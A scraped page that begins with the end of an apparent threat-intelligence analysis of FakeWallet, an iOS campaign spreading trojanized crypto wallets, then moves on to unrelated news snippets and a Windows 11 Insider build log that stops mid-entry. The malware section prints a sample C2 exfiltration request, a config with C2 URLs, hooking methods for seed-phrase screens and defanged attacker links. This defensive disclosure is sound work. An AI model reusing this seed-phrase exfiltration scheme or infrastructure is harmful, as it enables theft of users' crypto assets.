• Ledger
• Trust Wallet
• Coinbase
• TokenPocket
• imToken
• Bitpie

We’ve reported all of these findings to Apple, and several of the malicious apps have already been pulled from the store.

We also identified several similar apps that didn’t have any phishing functionality yet, but showed every sign of being linked to the same threat actors. It’s highly likely that the malicious features were simply waiting to be toggled on in a future update.

The phishing apps featured stubs – functional placeholders that mimicked a legitimate service – designed to make the app appear authentic.  The stub could be a game, a calculator, or a task planner.

However, once you launched the app, it would open a malicious link in your browser. This link kicks off a scheme leveraging provisioning profiles to install infected versions of crypto wallets onto the victim’s device. This technique isn’t exclusive to FakeWallet; other iOS threats, like SparkKitty, use similar methods. These profiles come in a few flavors, one of them being enterprise provisioning profiles. Apple designed these so companies could create and deploy internal apps to employees without going through the App Store or hitting device limits. Enterprise provisioning profiles are a favorite tool for makers of software cracks, cheats, online casinos, pirated mods of popular apps, and malware.

An infected wallet and its corresponding profile used for the installation process

The attackers have churned out a wide variety of malicious modules, each tailored to a specific wallet. In most cases, the malware is delivered via a malicious library injection, though we’ve also come across builds where the app’s original source code was modified.

To embed the malicious library, the hackers injected load commands into the main executable. This is a standard trick to expand an app’s functionality without a rebuild. Once the library is loaded, the dyld linker triggers initialization functions, if present in the library. We’ve seen this implemented in different ways: sometimes by adding a load method to specific Objective-C classes, and other times through standard C++ functions.

The logic remains the same across all initialization functions: the app loads or initializes its configuration, if available, and then swaps out legitimate class methods for malicious versions. For instance, we found a malicious library named libokexHook.dylib embedded in a modified version of the Coinbase app. It hijacks the original viewDidLoad method within the RecoveryPhraseViewController class, the part of the code responsible for the screen where the user enters their recovery phrase.

A code snippet where a malicious initialization function hijacks the original viewDidLoad method of the class responsible for the recovery phrase screen

The compromised viewDidLoad method works by scanning the screen in the current view controller (the object managing that specific app screen) to hunt for mnemonics – the individual words that make up the seed phrase. Once it finds them, it extracts the data, encrypts it, and beams it back to a C2 server. All these malicious modules follow a specific process to exfiltrate data:

• The extracted mnemonics are stringed together.
• This string is encrypted using RSA with the PKCS #1 scheme.
• The encrypted data is then encoded into Base64.
• Finally, the encoded string – along with metadata like the malicious module type, the app name, and a unique identification code – is sent to the attackers’ server.

The malicious viewDidLoad method at work, scraping seed phrase words from individual subviews

In this specific variant, the C2 server address is hardcoded directly into the executable. However, in other versions we’ve analyzed, the Trojan pulls the address from a configuration file tucked away in the app folder.

The POST request used to exfiltrate those encrypted mnemonics looks like this:

POST <c2_domain>/api/open/postByTokenPocket?ciyu=<base64_encoded_encrypted_mnemonics>&code=10001&ciyuType=1&wallet=ledger

The version of the malicious module targeting Trust Wallet stands out from the rest. It skips the initialization functions entirely. Instead, the attackers injected a custom executable section, labeled __hook, directly into the main executable. They placed it right before the __text section, specifically in the memory region usually reserved for load commands in the program header. The first two functions in this section act as trampolines to the dlsym function and the mnemonic validation method within the original WalletCore class. These are followed by two wrapper functions designed to:

• Resolve symbols dataInit or processX0Parameter from the malicious library
• Hand over control to these newly discovered functions
• Execute the code for the original methods that the wrapper was built to replace

The content of the embedded __hook section, showing the trampolines and wrapper functions

These wrappers effectively hijack the methods the app calls whenever a user tries to restore a wallet using a seed phrase or create a new one. By following the same playbook described earlier, the Trojan scrapes the mnemonics directly from the corresponding screens, encrypts them, and beams them back to the C2 server.

The Ledger wallet malicious module

The modules we’ve discussed so far were designed to rip recovery phrases from hot wallets – apps that store and use private keys directly on the device where they are installed. Cold wallets are a different beast: the keys stay on a separate, offline device, and the app is just a user interface with no direct access to them. To get their hands on those assets, the attackers fall back on old-school phishing.

We found two versions of the Ledger implant, one using a malicious library injection and another where the app’s source code itself was tampered with. In the library version, the malware sneaks in through standard entry points:  two Objective-C initialization functions (+[UIViewController load] and +[UIView load]) and a function named entry located in the __mod_init_functions section. Once the malicious library is loaded into the app’s memory, it goes to work:

• The entry function loads a configuration file from the app directory, generates a user UUID, and attempts to send it to the server specified by the login-url The config file looks like this:
  { "url": "hxxps://iosfc[.]com/ledger/ios/Rsakeycatch.php", // C2 for mnemonics "code": "10001", // special code "login-url": "hxxps://xxx[.]com", "login-code": "88761" }
• Two other initialization functions, +[UIViewController load] and +[UIView load], replace certain methods of the original app classes with their malicious payload.
• As soon as the root screen is rendered, the malware traverses the view controller hierarchy and searches for a child screen named add-account-cta or one containing a $ sign:
  • If it is the add-account-cta screen, the Trojan identifies the button responsible for adding a new account and matches its text to a specific language. The Trojan uses this to determine the app’s locale so it can later display a phishing alert in the appropriate language. It then prepares a phishing notification whose content will require the user to pass a “security check”, and stores it in an object of GlobalVariables
  • If it’s a screen with a $ sign in its name, the malware scans its content using a regular expression to extract the wallet balance and attempt to send this balance information to a harmless domain specified in the configuration as login-url. We assume this is outdated testing functionality left in the code by mistake, as the specified domain is unrelated to the malware.
• Then, when any screen is rendered, one of the malicious handlers checks its name. If it is the screen responsible for adding an account or buying/selling cryptocurrency, the malware displays the phishing notification prepared earlier. Clicking on this notification opens a WebView window, where the local HTML file html serves as the page to display.

The verify.html phishing page prompts the user to enter their mnemonics. The malware then checks the seed phrase entered by the user against the BIP-39 dictionary, a standard that uses 2048 mnemonic words to generate seed phrases. Additionally, to lower the victim’s guard, the phishing page is designed to match the app’s style and even supports autocomplete for mnemonics to project quality. The seed phrase is passed to an Objective-C handler, which merges it into a single string, encrypts it using RSA with the PKCS #1 scheme, and sends it to the C2 server along with additional data – such as the malicious module type, app name, and a specific config code – via an HTTP POST request to the /ledger/ios/Rsakeycatch.php endpoint.

The Objective-C handler responsible for exfiltrating mnemonics

The second version of the infected Ledger wallet involves changes made directly to the main code of the app written in React Native. This approach eliminates the need for platform-specific libraries and allows attackers to run the same malicious module across different platforms. Since the Ledger Live source code is publicly available, injecting malicious code into it is a straightforward task for the attackers.
The infected build includes two malicious screens:

• MnemonicVerifyScreen, embedded in PortfolioNavigator
• PrivateKeyVerifyScreen, embedded in MyLedgerNavigator

In the React Native ecosystem, navigators handle switching between different screens. In this case, these specific navigators are triggered when the Portfolio or Device List screens are opened. In the original app, these screens remain inaccessible until the user pairs their cold wallet with the application. This same logic is preserved in the infected version, effectively serving as an anti-debugging technique: the phishing window only appears during a realistic usage scenario.

Phishing window for seed phrase verification

The MnemonicVerifyScreen appears whenever either of those navigators is activated – whether the user is checking their portfolio or viewing info about a paired device. The PrivateKeyVerifyScreen remains unused – it is designed to handle a private key rather than a mnemonic, specifically the key generated by the wallet based on the entered seed phrase. Since Ledger Live doesn’t give users direct access to private keys or support them for importing wallets, we suspect this specific feature was actually intended for a different app.

Decompiled pseudocode of an anonymous malicious function setting up the configuration during app startup

Once a victim enters their recovery phrase on the phishing page and hits Confirm, the Trojan creates a separate thread to handle the data exfiltration. It tracks the progress of the transfer by creating three files in the app’s working directory:

• verify-wallet-status.json tracks the current status and the timestamp of the last update.
• verify-wallet-config.json stores the C2 server configuration the malware is currently using.
• verify-wallet-pending.json holds encrypted mnemonics until they’re successfully transmitted to the C2 server. Then the clearPendingMnemonicJob function replaces the contents of the file with an empty JSON dictionary.

Next, the Trojan encrypts the captured mnemonics and sends the resulting value to the C2 server. The data is encrypted using the same algorithm described earlier (RSA encryption followed by Base64 encoding). If the app is closed or minimized, the Trojan checks the status of the previous exfiltration attempt upon restart and resumes the process if it hasn’t been completed.

Decompiled pseudocode for the submitWalletSecret function

Other distribution channels, platforms, and the SparkKitty link

During our investigation, we discovered a website mimicking the official Ledger site that hosted links to the same infected apps described above. While we’ve only observed one such example, we’re certain that other similar phishing pages exist across the web.

A phishing website hosting links to infected Ledger apps for both iOS and Android

We also identified several compromised versions of wallet apps for Android, including both previously undiscovered samples and known ones. These instances were distributed through the same malicious pages; however, we found no traces of them in the Google Play Store.

One additional detail: some of the infected apps also contained a SparkKitty module. Interestingly, these modules didn’t show any malicious activity on their own, with mnemonics handled exclusively by the FakeWallet modules. We suspect SparkKitty might be present for one of two reasons: either the authors of both malicious campaigns are linked and forgot to remove it, or it was embedded by different attackers and is currently inactive.

Victims

Since nearly all the phishing apps were exclusive to the Chinese App Store, and the infected wallets themselves were distributed through Chinese-language phishing pages, we can conclude that this campaign primarily targets users in China. However, the malicious modules themselves have no built-in regional restrictions. Furthermore, since the phishing notifications in some variants automatically adapt to the app’s language, users outside of China could easily find themselves in the crosshairs of these attackers.

Attribution

According to our data, the threat actor behind this campaign may be linked to the creators of the SparkKitty Trojan. Several details uncovered during our research point to this connection:

• Some infected apps contained SparkKitty modules alongside the FakeWallet code.
• The attackers behind both campaigns appear to be native Chinese speakers, as the malicious modules frequently use log messages in Chinese.
• Both campaigns distribute infected apps via phishing pages that mimic the official App Store.
• Both campaigns specifically target victims’ cryptocurrency assets.

Conclusion

Our research shows that the FakeWallet campaign is gaining momentum by employing new tactics, ranging from delivering payloads via phishing apps published in the App Store to embedding themselves into cold wallet apps and using sophisticated phishing notifications to trick users into revealing their mnemonics. The fact that these phishing apps bypass initial filters to appear at the top of App Store search results can significantly lower a user’s guard. While the campaign is not exceptionally complex from a technical standpoint, it poses serious risks to users for several reasons:

• Hot wallet attacks: the malware can steal crypto assets during the wallet creation or import phase without any additional user interaction.
• Cold wallet attacks: attackers go to great lengths to make their phishing windows look legitimate, even implementing mnemonic autocomplete to mirror the real user experience and increase their chances of a successful theft.
• Investigation challenges: the technical restrictions imposed by iOS and the broader Apple ecosystem make it difficult to effectively detect and analyze malicious software directly on a device.

Indicators of compromise

Infected cryptowallet IPA file hashes
4126348d783393dd85ede3468e48405d
b639f7f81a8faca9c62fd227fef5e28c
d48b580718b0e1617afc1dec028e9059
bafba3d044a4f674fc9edc67ef6b8a6b
79fe383f0963ae741193989c12aefacc
8d45a67b648d2cb46292ff5041a5dd44
7e678ca2f01dc853e85d13924e6c8a45

Malicious dylib file hashes
be9e0d516f59ae57f5553bcc3cf296d1
fd0dc5d4bba740c7b4cc78c4b19a5840
7b4c61ff418f6fe80cf8adb474278311
8cbd34393d1d54a90be3c2b53d8fc17a
d138a63436b4dd8c5a55d184e025ef99
5bdae6cb778d002c806bb7ed130985f3

Malicious React Native application hash
84c81a5e49291fe60eb9f5c1e2ac184b

Phishing HTML for infected Ledger Live app file hash
19733e0dfa804e3676f97eff90f2e467

Malicious Android file hashes
8f51f82393c6467f9392fb9eb46f9301
114721fbc23ff9d188535bd736a0d30e

Malicious download links
hxxps://www.gxzhrc[.]cn/download/
hxxps://appstoreios[.]com/DjZH?key=646556306F6Q465O313L737N3332939Y353I830F31
hxxps://crypto-stroe[.]cc/
hxxps://yjzhengruol[.]com/s/3f605f
hxxps://6688cf.jhxrpbgq[.]com/6axqkwuq
hxxps://139.180.139[.]209/prod-api/system/confData/getUserConfByKey/
hxxps://xz.apps-store[.]im/s/iuXt?key=646Y563Y6F6H465J313X737U333S9342323N030R34&c=
hxxps://xz.apps-store[.]im/DjZH?key=646B563L6F6N4657313B737U3436335E3833331737
hxxps://xz.apps-store[.]im/s/dDan?key=646756376F6A465D313L737J333993473233038L39&c=
hxxps://xz.apps-store[.]im/CqDq?key=646R563V6F6Y465K313J737G343C3352383R336O35
hxxps://ntm0mdkzymy3n.oukwww[.]com/7nhn7jvv5YieDe7P?0e7b9c78e=686989d97cf0d70346cbde2031207cbf
hxxps://ntm0mdkzymy3n.oukwww[.]com/jFms03nKTf7RIZN8?61f68b07f8=0565364633b5acdd24a498a6a9ab4eca
hxxps://nziwytu5n.lahuafa[.]com/10RsW/mw2ZmvXKUEbzI0n
hxxps://zdrhnmjjndu.ulbcl[.]com/7uchSEp6DIEAqux?a3f65e=417ae7f384c49de8c672aec86d5a2860
hxxps://zdrhnmjjndu.ulbcl[.]com/tWe0ASmXJbDz3KGh?4a1bbe6d=31d25ddf2697b9e13ee883fff328b22f
hxxps://api.npoint[.]io/153b165a59f8f7d7b097
hxxps://mti4ywy4.lahuafa[.]com/UVB2U/mw2ZmvXKUEbzI0n
hxxps://mtjln.siyangoil[.]com/08dT284P/1ZMz5Xmb0EoQZVvS5
hxxps://odm0.siyangoil[.]com/TYTmtV8t/JG6T5nvM1AYqAcN
hxxps://mgi1y.siyangoil[.]com/vmzLvi4Dh/1Dd0m4BmAuhVVCbzF
hxxps://mziyytm5ytk.ahroar[.]com/kAN2pIEaariFb8Yc
hxxps://ngy2yjq0otlj.ahroar[.]com/EpCXMKDMx1roYGJ
hxxps://ngy2yjq0otlj.ahroar[.]com/17pIWJfr9DBiXYrSb

C2 addresses
hxxps://kkkhhhnnn[.]com/api/open/postByTokenpocket
hxxps://helllo2025[.]com/api/open/postByTokenpocket
hxxps://sxsfcc[.]com/api/open/postByTokenpocket
hxxps://iosfc[.]com/ledger/ios/Rsakeycatch.php
hxxps://nmu8n[.]com/tpocket/ios/Rsakeyword.php
hxxps://zmx6f[.]com/btp/ios/receiRsakeyword.php
hxxps://api.dc1637[.]xyz

Microsoft has released out-of-band (OOB) updates to fix issues affecting Windows Server systems after installing the April 2026 security updates. [...]

Cybersecurity researchers have flagged a new malware called ZionSiphon that appears to be specifically designed to target Israeli water treatment and desalination systems. The malware has been codenamed ZionSiphon by Darktrace, highlighting its ability to set up persistence, tamper with local configuration files, and scan for operational technology (OT)-relevant services on the local subnet. Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]

Windows 11 25H2 has been released, but behind the scenes, Microsoft is constantly working to improve the newest version of Windows. The company frequently rolls out public preview builds to members of its Windows Insider Program, allowing them to test out — and help shape — upcoming features.

Skip to the latest builds

The Windows Insider program is divided into four channels:

• The Canary Channel is where platform changes (such as major updates to the Windows kernel and new APIs) are previewed. These changes are not tied to a particular Windows release and may never ship at all. Little documentation is provided, and builds are likely to be very unstable. This channel is best for highly technical users.
• The Dev Channel is where new features are introduced for initial testing, regardless of which Windows release they’ll eventually end up in. This channel is best for technical users and developers and builds in it may be unstable and buggy.
• In the Beta Channel, you’ll get more polished features that will be deployed in the next major Windows release. This channel is best for early adopters, and Microsoft says your feedback in this channel will have the most impact.
• The Release Preview Channel typically doesn’t see action until shortly before a new feature update is rolled out. It’s meant for final testing of an upcoming release and is best for those who want the most stable builds.

The Beta and Release Preview Channels also receive bug-fix builds for the currently shipping version of Windows 11. See “How to preview and deploy Windows 10 and 11 updates” for more details about the four channels and how to switch to a different channel.

Not everyone can participate in the Windows 11 Insider program, because the new operating system has more stringent system requirements than Windows 10. If your PC fails to meet the minimum hardware requirements for Windows 11, you cannot join the Windows 11 Insider Program. (See “How to check if your PC can run Windows 11.”)

Below you’ll find information about the Windows 11 preview builds that have been announced by Microsoft in the past six months. (For the Release Preview Channel, we cover builds released for the current version of Windows 11, not for earlier versions.) For each build, we’ve included the date of its release, which Insider channel it was released to, a summary of what’s in the build, and a link to Microsoft’s announcement about it.

Note: If you’re looking for information about updates being rolled out to all Windows 11 users, not previews for Windows Insiders, see “Windows 11: A guide to the updates.”

The latest Windows 11 Insider preview builds Windows 11 Builds 26100.8313 and 26200.8313 (KB5083631) 

Release date: April 17, 2026

Released to: Release Preview Channel

This build introduces a wide variety of new features rolled out gradually, including a new way to monitor your agents from the taskbar. It supports agents across first- and third-party apps, with Researcher in the Microsoft 365 Copilot app as the first adopter. When Researcher works on a report, Windows shows progress on the taskbar so you can check updates at a glance.

For IT administrators, the update gradually rolls out support for a dynamic app removal list to the “Remove Default Microsoft Store packages” policy for Windows Enterprise and Education. It also removes default trust for cross‑signed third-party drivers, while drivers from the Windows Hardware Compatibility Program (WHCP) and an allow list of trusted legacy drivers remain allowed. Enterprise State Roaming can now be managed through Windows Backup for Organizations policies.

The update also immediately introduces two minor improvements for everyone. Windows quality updates now include additional high-confidence device targeting data, which increases coverage of devices eligible to automatically receive new Secure Boot certificates. In Windows Security, the name of the affected application is now included in event logging related to CVE‑2024‑30098. This change makes it easier to identify applications that rely on smart card certificates and may need updates following recent security changes.

(Get more info about Windows 11 Builds 26100.8313 and 26200.8313.)

Windows 11 Insider Preview Build 26220.8271

Release date: April 17, 2026

Released to: Beta Channel

Several minor new features were made available in this build for those who have turned the toggle on to receive the latest updates, including improved reliability and performance of Windows Hello fingerprint after your PC wakes from sleep.

(Get more info about Windows 11 Insider Preview Build 26220.8271.)

Windows 11 Insider Preview Build 26300.8276

Release date: April 17, 2026

Released to: Dev Channel

In this build, several minor new features are being gradually rolled for those who have turned the toggle on to receive the latest updates, including improved reliability and performance of Windows Hello fingerprint after your PC wakes from sleep.

(Get more info about Windows 11 Insider Preview Build 26300.8276.)

Windows 11 Insider Preview Build 28020.1863

Release date: April 17, 2026

Released to: Canary Channel

For those who have turned the toggle on to receive the latest updates, this build fixes a bug that prevented some apps from signing in due to a false report of no internet connectivity. The fix is rolling out gradually.

(Get more info about Windows 11 Insider Preview Build 28020.1863.)

Windows 11 Insider Preview Build 29570.1000

Release date: April 17, 2026

Released to: Canary Channel (29500 build series)

For those who have turned the toggle on to receive the latest updates in the Canary Channel on the optional 29500 build series, this build has a variety of minor changes rolling out gradually, including more widget options and support for lock screen widget personalization, a new setting in Settings > Bluetooth & Devices > Touchpad that lets you can choose how large the right-click zone is, and support for a dynamic app removal list to the “Remove Default Microsoft Store packages” policy for Windows Enterprise and Education.

(Get more info about Windows 11 Insider Preview Build 29570.1000.)

Windows 11 Insider Preview Build 26220.8165

Release date: April 10, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several minor features, including one in which the size limit for formatting FAT32 volumes via the command line has increased from 32GB to 2TB, and another in which the Windows Security app gets new badges and text that reflect your device’s Secure Boot state and certificate status.

It also gradually rolls out a fix for a bug that caused Settings > Network & Internet > Data Usage to show large, unrealistic values.

(Get more info about Windows 11 Insider Preview Build 26220.8165.)

Windows 11 Insider Preview Build 26300.8170

Release date: April 10, 2026

Released to: Dev Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several minor features, including one in which the size limit for formatting FAT32 volumes via the command line has increased from 32GB to 2TB, and another in which the Windows Security app gets new badges and text that reflect your device’s Secure Boot state and certificate status.

It also gradually rolls out a fix for a bug that caused Settings > Network & Internet > Data Usage to show large, unrealistic values.

(Get more info about Windows 11 Insider Preview Build 26300.8170.)

Windows 11 Insider Preview Build 28020.1812

Release date: April 10, 2026

Released to: Canary Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out general improvements and fixes, including a new setting that lets users choose the size of their touchpad’s right-click zone, as well as new badges and text in the Windows Security app that reflect your device’s Secure Boot state and certificate status.

(Get more info about Windows 11 Insider Preview Build 28020.1812.)

Windows 11 Insider Preview Build 29565.1000

Release date: April 10, 2026

Released to: Canary Channel (29500 build series)

For those who have turned the toggle on to receive the latest updates in the Canary Channel on the optional 29500 build series, this build includes “platform changes in moving to a new active development build,” as well as new badges and text in the Windows Security app that reflect your device’s Secure Boot state and certificate status

(Get more info about Windows 11 Insider Preview Build 29565.1000.)

Windows 11 Insider Preview Build 26220.8148

Release date: April 3, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several minor features, including a new icon in print settings to indicate when a printer supports Windows Protected Print Mode.

Several bugs are also being fixed, including one in which some apps weren’t able to sign in, citing an internal connection issue when internet was actually connected.

(Get more info about Windows 11 Insider Preview Build 26220.8148.)

Windows 11 Insider Preview Build 26300.8155

Release date: April 3, 2026

Released to: Dev Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several minor features, including one in which users will be able to feel haptic feedback effects on compatible input devices while performing certain actions, such as aligning objects in PowerPoint, window snapping, resizing, or hovering over the Close button. These haptic effects can be configured in Settings under Bluetooth & devices > Mouse > Haptic signals.

Several bugs have also been fixed, including one in which some apps weren’t able to sign in, citing an internal connection issue when internet was actually connected.

(Get more info about Windows 11 Insider Preview Build 26300.8155.)

Windows 11 Insider Preview Build 28020.1803

Release date: April 3, 2026

Released to: Canary Channel

For those who have turned the toggle on to receive the latest updates in the Canary Channel, this build includes a small set of general improvements and fixes, including improved reliability for configuring the fluid dictation option in voice typing settings.

(Get more info about Windows 11 Insider Preview Build 28020.1803.)

Windows 11 Insider Preview Build 29560.1000

Release date: April 3, 2026

Released to: Canary Channel (29500 build series)

For those who have turned the toggle on to receive the latest updates in the Canary Channel on the optional 29500 build series, this build “includes platform changes in moving to a new active development build,” in the words of Microsoft. Several bugs have also been fixed, including one in which attached USB devices weren’t working for some Insiders.

(Get more info about Windows 11 Insider Preview Build 29560.1000.)

Windows 11 Insider Preview Build 26220.8138

Release date: March 30, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several new features, including one in which you can enable Administrator Protection in Settings under Privacy & security > Windows Security > Account protection and switching the toggle to on. A restart will be required. 

(Get more info about Windows 11 Insider Preview Build 26220.8138.)

Windows 11 Insider Preview Build 26300.8142

Release date: March 30, 2026

Released to: Dev Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several new features, including one in which you can enable Administrator Protection in Settings under Privacy & security > Windows Security > Account protection and switching the toggle to on. A restart will be required. 

(Get more info about Windows 11 Insider Preview Build 26300.8142.)

Windows 11 Insider Preview Build 28020.1797

Release date: March 30, 2026

Released to: Canary Channel

This update, in the words of Microsoft, “includes a small set of general improvements and fixes that improve the overall experience” of running Windows 11.

(Get more info about Windows 11 Insider Preview Build 28020.1797.)

Windows 11 Insider Preview Build 29558.1000

Release date: March 30, 2026

Released to: Canary Channel (29500 build series)

For those who have turned the toggle on to receive the latest updates in the Windows 11 Insider Canary Channel on the optional 29500 build series, this build introduces several new features, including a variety of improvements to the Windows Console, many of which were created by open-source contributors. Several bugs have also been fixed, including an authentication error people received when trying to connect to Azure Virtual Desktop.

(Get more info about Windows 11 Insider Preview Build 29558.1000.)

Windows 11 Insider Preview Build 26220.8079

Release date: March 20, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several bug fixes, including for one in which the Network and Sharing Center incorrectly displayed two active Wi-Fi connections after switching from one Wi-Fi network to another. The Network and Sharing Center now correctly shows a single active Wi-Fi connection when you connect to a new network. 

(Get more info about Windows 11 Insider Preview Build 26220.8079.)

Windows 11 Insider Preview Build 26300.8085

Release date: March 20, 2026

Released to: Dev Channel

For those who have turned the toggle on to receive the latest updates, this build resumes rollout of the Point Indicator Accessibility setting, which enables low-vision users to easily locate and use their cursor. The build also introduces the new Feedback Hub, which offers Insiders simpler navigation and feedback submission flows.

In addition, several bugs were fixed, including one in which the Network and Sharing Center incorrectly displayed two active Wi-Fi connections after switching from one Wi-Fi network to another. The Network and Sharing Center now correctly shows a single active Wi-Fi connection when you connect to a new network.

(Get more info about Windows 11 Insider Preview Build 26300.8085.)

Windows 11 Insider Preview Build 28020.1743

Release date: March 20, 2026

Released to: Canary Channel

For those who have turned the toggle on to receive the latest updates, this build includes several new features being rolled out gradually, including one in which shared audio now provides individual sliders for each listener which adjusts their volume without affecting the other. You can continue to adjust volume for both listeners at the same time through the main volume controls available through Quick Settings or on-device and keyboard controls.

The build also introduces the new Feedback Hub, which offers Insiders simpler navigation and feedback submission flows.

(Get more info about Windows 11 Insider Preview Build 28020.1743.)

Windows 11 Insider Preview Build 29553.1000

Release date: March 20, 2026

Released to: Canary Channel (29500 build series)

For those who have turned the toggle on to receive the latest updates in the Canary Channel’s optional 29500 build series, this build introduces the new Feedback Hub, which offers Insiders simpler navigation and feedback submission flows.

(Get more info about Windows 11 Insider Preview Build 29553.1000.)

Windows 11 Insider Preview Build 26220.8062

Release date: March 13, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build includes numerous changes and refinements, including an update to the “Remove Default Microsoft Store packages” policy for Windows Enterprise and Education SKUs that allows IT administrators to remove MSIX/APPX apps by adding their app package family name (PFNs) to a dynamic list.

Starting with this update, the Windows kernel will enforce a new policy removing default trust for cross-signed drivers. The policy allows third-party drivers from the WHCP program by default, with an allow list of trustworthy publishers and drivers from the cross-signing program.

(Get more info about Windows 11 Insider Preview Build 26220.8062.)

Windows 11 Insider Preview Build 26300.8068

Release date: March 13, 2026

Released to: Dev Channel

For those who have turned the toggle on to receive the latest updates, this build includes numerous changes and refinements, including an update to the “Remove Default Microsoft Store packages” policy for Windows Enterprise and Education SKUs that allows IT administrators to remove MSIX/APPX apps by adding their app package family name (PFNs) to a dynamic list.

Starting with this update, the Windows kernel will enforce a new policy removing default trust for cross-signed drivers. The policy allows third-party drivers from the WHCP program by default, with an allow list of trustworthy publishers and drivers from the cross-signing program.

(Get more info about  Windows 11 Insider Preview Build 26300.8068.)

Windows 11 Insider Preview Build 28020.1737

Release date: March 13, 2026

Released to: Canary Channel

For those who have turned the toggle on to receive the latest updates, this build makes refinements to the Pen settings page, including small changes to the options for the pen tail button. A new option, “Same as Copilot key,” enables the pen tail button to launch the same app as the Copilot key.

(Get more info about Windows 11 Insider Preview Build 28020.1737.)

Windows 11 Insider Preview Build 29550.1000

Release date: March 13, 2026

Released to: Canary Channel (29500 build series)

For those  who have turned the toggle on to receive the latest updates in the Canary Channel’s optional 29500 build series, this build has a variety of minor changes, including one in which changes to global power settings (for example, Display, Sleep, Hibernate timeouts, Power/Sleep button, and lid close actions) from Settings are now applied to all power plans. This should help improve persistence of chosen settings.

(Get more info about Windows 11 Insider Preview Build 29550.1000.)

Windows 11 Insider Preview Builds 26100.8106 and 26200.8106

Release date: March 12, 2026

Released to: Release Preview Channel

This build introduces a wide range of minor features being rolled out gradually, including the ability to turn Smart App Control (SAC) on or off without needing a clean install. To make changes, go to Settings > Windows Security > App & Browser Control > Smart App Control settings. When turned on, SAC helps block untrusted or potentially harmful apps.

The update also improves stability in Windows Recovery Environment (Windows RE) when you run x64 apps on ARM64 devices. These apps run more smoothly and respond as expected.

(Get more info about Windows 11 Insider Preview Builds 26100.8106 and 26200.8106.)

Windows 11 Insider Preview Build 26220.7961

Release date: March 6, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build re-enables Administrator protection, which aims to protect free-floating admin rights for administrator users, allowing them to still perform all admin functions with just-in-time admin privileges. This feature is off by default and can be enabled via OMA-URI in Intune or via group policy.

Other changes and improvements being gradually rolled out to the same group include the ability to use voice typing (Windows key + H) when renaming files in File Explorer, as well as a smaller peek view in the drag tray.

(Get more info about Windows 11 Insider Build 26220.7961.)

Windows 11 Insider Preview Build 26300.7965

Release date: March 6, 2026

Released to: Dev Channel

For those who have turned the toggle on to receive the latest updates, this build re-enables Administrator protection, which aims to protect free-floating admin rights for administrator users, allowing them to still perform all admin functions with just-in-time admin privileges. This feature is off by default and can be enabled via OMA-URI in Intune or via group policy.

Other changes and improvements being gradually rolled out to the same group include the ability to use voice typing when renaming files in File Explorer, as well as a smaller peek view in the drag tray.

(Get more info about Windows 11 Insider Preview Build 26300.7965.)

Windows 11 Insider Preview Build 28020.1685

Release date: March 6, 2026

Released to: Canary Channel

For those who have turned the toggle on to receive the latest updates, this build lets you use voice typing (Windows key + H) when renaming files in File Explorer. The build also improves the reliability of removing Windows Update files and windows.old files via Settings > System > Storage.

(Get more info about Windows 11 Insider Preview Build 28020.1685.)

Windows 11 Insider Preview Build 26220.7934

Release date: Feb. 27, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build gives administrators and Application Control for Business policy authors additional controls over the processing of batch files and CMD scripts. Starting with this release, admins can enable a more secure mode for processing batch files that ensures they do not change during execution by adding a value to the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor named LockBatchFilesWhenInUse (DWORD, value 0 or 1). Policy authors can also use the LockBatchFilesWhenInUse application manifest control documented here to enable this mode.

There are a variety of other improvements being rolled out gradually, including one in which a new taskbar indicator displays while you’re sharing, giving a quick reminder that audio is still being shared. Clicking the indicator is a fast path to open sharing settings to change volume or stop sharing.

(Get more info about Windows 11 Insider Preview Build 26220.7934.)

Windows 11 Insider Preview Build 26300.7939

Release date: Feb. 27, 2026

Released to: Dev Channel

For those who opted to receive the latest updates, this build gives administrators and Application Control for Business policy authors additional controls over the processing of batch files and CMD scripts. Starting with this release, admins can enable a more secure mode for processing batch files that ensures they do not change during execution by adding a value to the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor named LockBatchFilesWhenInUse (DWORD, value 0 or 1). Policy authors can also use the LockBatchFilesWhenInUse application manifest control documented here to enable this mode.

There are a variety of other improvements being rolled out gradually, including one in which a new taskbar indicator displays while you’re sharing, offering a quick reminder that audio is still being shared. Clicking the indicator is a fast path to open sharing settings to change volume or stop sharing.

(Get more info about Windows 11 Insider Preview Build 26300.7939.)

Windows 11 Insider Preview Build 28020.1673

Release date: Feb. 27, 2026

Released to: Canary Channel

For those who have opted to receive the latest updates, this build gets a variety of new features being rolled out gradually, including one in which Quick Machine Recovery (QMR) now turns on automatically for enterprise managed Windows Professional devices, as well as Windows Professional devices that are not domain-joined. These devices receive the same recovery features available to Windows Home users. For domain-joined devices, QMR stays off unless it is enabled by the organization.

(Get more info about Windows 11 Insider Preview Build 28020.1673.)

Windows 11 Insider Preview Build 26220.7872

Release date: February 20, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build offers a variety of new features, including simplified specifications on the ‘Device info’ Card on the Settings Home page and improved mouseover animations for app groups on the taskbar.

(Get more info about Windows 11 Insider Preview Build 26220.7872.)

Windows 11 Insider Preview Build 26300.7877

Release date: February 20, 2026

Released to: Dev Channel

For those who have turned the toggle on to receive the latest updates, this build offers a variety of new features, including simplified specifications on the ‘Device info’ Card on the Settings Home page and improved mouseover animations for app groups on the taskbar.

Several bugs have also been fixed, including one in which all File Explorer open windows and tabs unexpectedly jumped to Desktop or Home.

Get more info about Windows 11 Insider Preview Build 26300.7877.)

Windows 11 Insider Preview Build 28020.1619

Release date: February 20, 2026

Released to: Canary Channel

